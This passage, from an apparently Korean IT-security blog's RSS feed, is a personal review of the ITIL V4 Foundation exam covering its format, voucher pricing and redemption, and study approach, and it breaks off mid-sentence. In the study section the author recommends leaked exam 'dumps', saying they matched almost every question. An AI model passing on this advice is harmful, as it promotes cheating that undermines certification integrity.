<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>보안맨</title>
    <link>https://hackingstudypad.tistory.com/</link>
    <description>해킹 / 정보보안 / IT / 자격증</description>
    <language>ko</language>
    <pubDate>Wed, 17 Jun 2026 21:54:43 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>SecurityMan</managingEditor>
    <image>
      <title>보안맨</title>
      <url>https://tistory1.daumcdn.net/tistory/3374906/attach/e0214c22162d475998a7db9e7ea92e73</url>
      <link>https://hackingstudypad.tistory.com</link>
    </image>
    <item>
      <title>[ITIL V4 Foundation] 시험정보 / 접수방법 / 후기 / 공부방법</title>
      <link>https://hackingstudypad.tistory.com/724</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;24. ITILV4 FOUNDATION.png&quot; data-origin-width=&quot;586&quot; data-origin-height=&quot;831&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/UWZMF/dJMb9O8zDgJ/OCFs4hkn7K6G7B982v2oX1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/UWZMF/dJMb9O8zDgJ/OCFs4hkn7K6G7B982v2oX1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/UWZMF/dJMb9O8zDgJ/OCFs4hkn7K6G7B982v2oX1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FUWZMF%2FdJMb9O8zDgJ%2FOCFs4hkn7K6G7B982v2oX1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;399&quot; height=&quot;566&quot; data-filename=&quot;24. ITILV4 FOUNDATION.png&quot; data-origin-width=&quot;586&quot; data-origin-height=&quot;831&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2025년 9월 취득한 ITIL V4 Foundation 자격증&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;제목 없음.png&quot; data-origin-width=&quot;769&quot; data-origin-height=&quot;771&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dsyLcs/dJMb9fdXhnb/lQlTDWly9urLOb2JxuOR91/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dsyLcs/dJMb9fdXhnb/lQlTDWly9urLOb2JxuOR91/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dsyLcs/dJMb9fdXhnb/lQlTDWly9urLOb2JxuOR91/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdsyLcs%2FdJMb9fdXhnb%2FlQlTDWly9urLOb2JxuOR91%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;769&quot; height=&quot;771&quot; data-filename=&quot;제목 없음.png&quot; data-origin-width=&quot;769&quot; data-origin-height=&quot;771&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;40문제중 1문제를 틀려서 98% 점수로 합격했다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;시험이 종료되면 바로 pdf 성적표를 받아볼수있다.&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;IT 서비스 관리 분야에서 가장 널리 알려진 국제 자격 중 하나인 ITIL V4 Foundation. &lt;br /&gt;&lt;br /&gt;영국&amp;nbsp;AXELOS에서&amp;nbsp;인증하고&amp;nbsp;PeopleCert에서&amp;nbsp;시험을&amp;nbsp;주관하는&amp;nbsp;자격으로, &lt;br /&gt;IT 서비스의 설계/운영/개선 전 과정에 걸친 서비스 관리 체계의 이해도를 평가한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ITIL(Information&amp;nbsp;Technology&amp;nbsp;Infrastructure&amp;nbsp;Library)은 &lt;br /&gt;조직이&amp;nbsp;IT&amp;nbsp;서비스를&amp;nbsp;비즈니스&amp;nbsp;요구사항에&amp;nbsp;맞게&amp;nbsp;효율적으로&amp;nbsp;운영하기&amp;nbsp;위한 &lt;br /&gt;프레임워크이자&amp;nbsp;베스트&amp;nbsp;프랙티스를&amp;nbsp;다룬다. &lt;br /&gt;&lt;br /&gt;그중&amp;nbsp;Foundation&amp;nbsp;레벨은&amp;nbsp;가장&amp;nbsp;기초적인&amp;nbsp;단계로, &lt;br /&gt;서비스&amp;nbsp;관리의&amp;nbsp;핵심&amp;nbsp;개념,&amp;nbsp;4P(Principles,&amp;nbsp;Practices,&amp;nbsp;Partners,&amp;nbsp;Products)&amp;nbsp;구조, &lt;br /&gt;그리고&amp;nbsp;Service&amp;nbsp;Value&amp;nbsp;System(SVS)&amp;nbsp;전반에&amp;nbsp;대한&amp;nbsp;이해를&amp;nbsp;평가한다. &lt;br /&gt;&lt;br /&gt;응시&amp;nbsp;자격에는&amp;nbsp;별도&amp;nbsp;제한이&amp;nbsp;없다. &lt;br /&gt;IT&amp;nbsp;서비스&amp;nbsp;관리,&amp;nbsp;운영,&amp;nbsp;프로젝트,&amp;nbsp;보안&amp;nbsp;등&amp;nbsp;관련&amp;nbsp;업무&amp;nbsp;종사자라면&amp;nbsp;누구나&amp;nbsp;응시&amp;nbsp;가능하다. &lt;br /&gt;시험은&amp;nbsp;PeopleCert&amp;nbsp;플랫폼을&amp;nbsp;통한&amp;nbsp;온라인&amp;nbsp;감독(Online&amp;nbsp;Proctored&amp;nbsp;Exam)&amp;nbsp;방식으로&amp;nbsp;진행된다. &lt;br /&gt;시험&amp;nbsp;전&amp;nbsp;웹캠,&amp;nbsp;마이크,&amp;nbsp;네트워크&amp;nbsp;환경을&amp;nbsp;점검하고,&amp;nbsp;감독관이&amp;nbsp;실시간으로&amp;nbsp;응시&amp;nbsp;과정을&amp;nbsp;모니터링한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;시험 구성은 아래와 같다.&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;문항 수: 40문항 (모두 객관식)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;시험 시간: 60분 (영어가 모국어가 아닐경우 15분 더 제공)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;합격 기준: 65% 이상 (26문항 이상 정답)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;시험 언어: 영어, 중국어, 프랑스어, 독일어, 스페인어, 일본어 등 (한국어 안됨)&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;한국어 지원이 안된다는것이 큰 압박인데&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;다행히 시험문제가 거의 문제은행에서 나오고&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;문제들이 간단간단해서 몇번 반복하면 굳이 해석하지 않아도&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;답을 찾을수 있는 경지에 오르게 된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure id=&quot;og_1761477961119&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;ITIL 4 Foundation&quot; data-og-description=&quot;Rescheduling an exam up to 48 hours before its start time is free. Rescheduling at a later stage is subject to additional charges. A fee of USD 60 / EUR70 / GBP 60 / AUD 85 / JPY 6815 (depending on country/currency, plus tax where applicable) will be charg&quot; data-og-host=&quot;www.peoplecert.org&quot; data-og-source-url=&quot;https://www.peoplecert.org/browse-certifications/it-governance-and-service-management/ITIL-1/itil-4-foundation-2565&quot; data-og-url=&quot;https://www.peoplecert.org/browse-certifications/it-governance-and-service-management/ITIL-1/itil-4-foundation-2565&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://www.peoplecert.org/browse-certifications/it-governance-and-service-management/ITIL-1/itil-4-foundation-2565&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.peoplecert.org/browse-certifications/it-governance-and-service-management/ITIL-1/itil-4-foundation-2565&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;ITIL 4 Foundation&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Rescheduling an exam up to 48 hours before its start time is free. Rescheduling at a later stage is subject to additional charges. A fee of USD 60 / EUR70 / GBP 60 / AUD 85 / JPY 6815 (depending on country/currency, plus tax where applicable) will be charg&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.peoplecert.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;시험접수는 기본적으로 peoplecert 홈페이지에서 하는데&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1154&quot; data-origin-height=&quot;649&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bIgHpJ/dJMb9hpi3wg/kVqEQOEPPBPQmbkkTrvvb0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bIgHpJ/dJMb9hpi3wg/kVqEQOEPPBPQmbkkTrvvb0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bIgHpJ/dJMb9hpi3wg/kVqEQOEPPBPQmbkkTrvvb0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbIgHpJ%2FdJMb9hpi3wg%2FkVqEQOEPPBPQmbkkTrvvb0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1154&quot; height=&quot;649&quot; data-origin-width=&quot;1154&quot; data-origin-height=&quot;649&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기서 바로 접수해버리면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;무려 669달러를 내야한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;쓸모없는 ebook과 learning resource kit가 포함되어 있는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이거 뺄수도 없다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure id=&quot;og_1761478073977&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;ITIL&amp;reg; 4 Foundation Exam voucher - PassionIT Group [30% Off]&quot; data-og-description=&quot;The ITIL&amp;reg; 4 Foundation Exam voucher allows you to sit for the ITIL&amp;reg; Foundation certification exam. The exam voucher is for a PeopleCert take anywhere/anytime exam.&quot; data-og-host=&quot;www.passionitgroup.com&quot; data-og-source-url=&quot;https://www.passionitgroup.com/product/itil4-foundation-exam-voucher/&quot; data-og-url=&quot;https://www.passionitgroup.com/product/itil4-foundation-exam-voucher/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/d5tL2H/hyZMsB5fci/4Ra5by2SV2cmACIaxV8yg0/img.png?width=600&amp;amp;height=400&amp;amp;face=0_0_600_400,https://scrap.kakaocdn.net/dn/Osau0/hyZMzf2Uva/7KIHLywySGpcSTvoYEkPy0/img.png?width=600&amp;amp;height=400&amp;amp;face=0_0_600_400,https://scrap.kakaocdn.net/dn/FWXwd/hyZMfW1Cnn/ocLux6ig5gOKK9KD9Oeva1/img.png?width=600&amp;amp;height=400&amp;amp;face=0_0_600_400&quot;&gt;&lt;a href=&quot;https://www.passionitgroup.com/product/itil4-foundation-exam-voucher/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.passionitgroup.com/product/itil4-foundation-exam-voucher/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/d5tL2H/hyZMsB5fci/4Ra5by2SV2cmACIaxV8yg0/img.png?width=600&amp;amp;height=400&amp;amp;face=0_0_600_400,https://scrap.kakaocdn.net/dn/Osau0/hyZMzf2Uva/7KIHLywySGpcSTvoYEkPy0/img.png?width=600&amp;amp;height=400&amp;amp;face=0_0_600_400,https://scrap.kakaocdn.net/dn/FWXwd/hyZMfW1Cnn/ocLux6ig5gOKK9KD9Oeva1/img.png?width=600&amp;amp;height=400&amp;amp;face=0_0_600_400');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;ITIL&amp;reg; 4 Foundation Exam voucher - PassionIT Group [30% Off]&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;The ITIL&amp;reg; 4 Foundation Exam voucher allows you to sit for the ITIL&amp;reg; Foundation certification exam. The exam voucher is for a PeopleCert take anywhere/anytime exam.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.passionitgroup.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;요즘같은 환율에 조금이라도 아껴보고자&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;PASSIONIT GROUP에서 시험접수를 하면 더 저렴하게 할수있다는것을 알아냈다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1350&quot; data-origin-height=&quot;622&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cqteTL/dJMb9PzEqeZ/q1hCkF9vnCbGu03hwHhBUK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cqteTL/dJMb9PzEqeZ/q1hCkF9vnCbGu03hwHhBUK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cqteTL/dJMb9PzEqeZ/q1hCkF9vnCbGu03hwHhBUK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcqteTL%2FdJMb9PzEqeZ%2Fq1hCkF9vnCbGu03hwHhBUK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1350&quot; height=&quot;622&quot; data-origin-width=&quot;1350&quot; data-origin-height=&quot;622&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기는 바우처가 699달러로 30달러 비싸게 나왔지만&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1334&quot; data-origin-height=&quot;613&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ccudz8/dJMb85Ja0bO/Zh548gsDF89YCT7W3dcLH0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ccudz8/dJMb85Ja0bO/Zh548gsDF89YCT7W3dcLH0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ccudz8/dJMb85Ja0bO/Zh548gsDF89YCT7W3dcLH0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fccudz8%2FdJMb85Ja0bO%2FZh548gsDF89YCT7W3dcLH0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1334&quot; height=&quot;613&quot; data-origin-width=&quot;1334&quot; data-origin-height=&quot;613&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;재시험 옵션과 셀프 트레이닝 옵션을&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;No Thank You 체크하면 499달러로 떨어진다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1300&quot; data-origin-height=&quot;685&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Gjq74/dJMb9hW80kE/cYgKMMCtTYKkkH8BKMBG60/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Gjq74/dJMb9hW80kE/cYgKMMCtTYKkkH8BKMBG60/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Gjq74/dJMb9hW80kE/cYgKMMCtTYKkkH8BKMBG60/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGjq74%2FdJMb9hW80kE%2FcYgKMMCtTYKkkH8BKMBG60%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1300&quot; height=&quot;685&quot; data-origin-width=&quot;1300&quot; data-origin-height=&quot;685&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;결제하면 이렇게&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;바우처 코드가 포함된 이메일이 날아온다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;요즘 환율로 약 70만원.. 어마어마한 금액이다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1352&quot; data-origin-height=&quot;691&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/VFsTV/dJMb8Vs1CYc/9wNRDNTbQHyelyvOoIDzI1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/VFsTV/dJMb8Vs1CYc/9wNRDNTbQHyelyvOoIDzI1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/VFsTV/dJMb8Vs1CYc/9wNRDNTbQHyelyvOoIDzI1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FVFsTV%2FdJMb8Vs1CYc%2F9wNRDNTbQHyelyvOoIDzI1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1352&quot; height=&quot;691&quot; data-origin-width=&quot;1352&quot; data-origin-height=&quot;691&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이 바우처 코드를 어디에 입력해야하는지 몰라서 엄청 헤맸는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기 결제화면에 있는 I HAVE A PROMO CODE 부분이 입력하는게 아니라&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1583&quot; data-origin-height=&quot;368&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c1STgQ/dJMb9Qk06Ig/lEcCBqlikUjH6d9ge8RoXk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c1STgQ/dJMb9Qk06Ig/lEcCBqlikUjH6d9ge8RoXk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c1STgQ/dJMb9Qk06Ig/lEcCBqlikUjH6d9ge8RoXk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc1STgQ%2FdJMb9Qk06Ig%2FlEcCBqlikUjH6d9ge8RoXk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1583&quot; height=&quot;368&quot; data-origin-width=&quot;1583&quot; data-origin-height=&quot;368&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기 Overview 에 있는&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Redeem your voucher 에 입력하면 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그럼 시험 접수할수 있는 메뉴가 나오고,&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;거기서 원하는 시간대에 시험을 예약한 후&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;예약한 시간에 맞춰 접속하면 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;하기전에 웹캠이랑 스피커, 마이크 체크는 반드시 하고가는게 좋다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;경험상 CISA 시험칠때 온라인 감독보다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;감독관이 훨씬 유한거 같다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공부는 약 한달정도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;흔히 구할수 있는 덤프와 Udemy 에서 제공하는 모의고사, ITIL 공부 앱(무료)를 사용했다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사실 Udemy와 ITIL앱이 무슨 의미가 있나 싶을정도로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;99%문제가 덤프랑 똑같이 나왔다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Udemy 에서 제공하는 모의고사는 굉장히 어려워서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;한번 풀어봤다가 당황해서 시험 공부 기간을 연장했는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그럴 필요가 없었다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그냥 덤프가 짱이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1155&quot; data-origin-height=&quot;752&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/u28WU/dJMb9LD0F3D/SVn1DbWX4Xis7K212rnPtk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/u28WU/dJMb9LD0F3D/SVn1DbWX4Xis7K212rnPtk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/u28WU/dJMb9LD0F3D/SVn1DbWX4Xis7K212rnPtk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fu28WU%2FdJMb9LD0F3D%2FSVn1DbWX4Xis7K212rnPtk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1155&quot; height=&quot;752&quot; data-origin-width=&quot;1155&quot; data-origin-height=&quot;752&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ITIL V4 Foundation 자격증은 유효기간이 없다고 들었는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사실 있었다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3년의 유효기간이 주어지며&lt;/p&gt;
